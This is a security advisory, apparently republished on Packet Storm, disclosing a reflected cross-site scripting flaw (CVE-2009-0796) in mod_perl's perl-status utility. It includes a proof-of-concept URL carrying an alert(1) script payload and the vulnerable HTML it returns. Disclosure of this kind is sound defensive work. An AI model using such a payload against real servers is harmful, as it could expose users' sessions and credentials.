exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mod-Perl Perl-Status Cross Site Scripting

Mod-Perl Perl-Status Cross Site Scripting
Posted Apr 15, 2009
Authored by Richard Brain | Site procheckup.com

The perl-status utility as included with Mod_perl suffers from a cross site scripting vulnerability.

tags | exploit, perl, xss
advisories | CVE-2009-0796
SHA-256 | de439bb421e77dc689929ce1ef77502f19c9bc54c7d2836c7d566630c8db74c5

Mod-Perl Perl-Status Cross Site Scripting

Change Mirror Download
Vulnerability found: 28th February 2009

Vendor informed: 1st March 2009

Advisory last updated: 1st March 2009

Severity: Medium/High

Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

CVE reference: CVE-2009-0796
BID: 34383

Many thanks to Torsten Foertsch for his kind assistance in fixing the bug.

Description:

There is a Cross-site Scripting vulnerability on Mod_perl's, perl-status utility. The perl-status utility on request displays the current status of the Mod_perl server, and some configuration information. Perl-status when configured to allow any viewers, presents an information disclosure risk,
Procheckup has found by making a malformed request to perl-status, that additionally a vanilla cross site scripting (XSS) attack is possible.


Proof of concept:

Submitting the following string to an unpatched server "server".
http://server:80/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E


The following is returned:-
<p><a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?env">Environment</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?inc">Loaded Modules</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?inh_tree">Inheritance Tree</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?isa_tree">ISA Tree</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?myconfig">Perl Configuration</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?rgysubs">Compiled Registry Scripts</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?script">PerlRequire'd Files</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?sig">Signal Handlers</a><br />
<a href="/perl-status/APR::SockAddr::port/"><script>alert(1)</script>?symdump">Symbol Table Dump</a><br />
</p></body></html>


An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties.


Fix:


http://perl.apache.org/


Legal:

Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close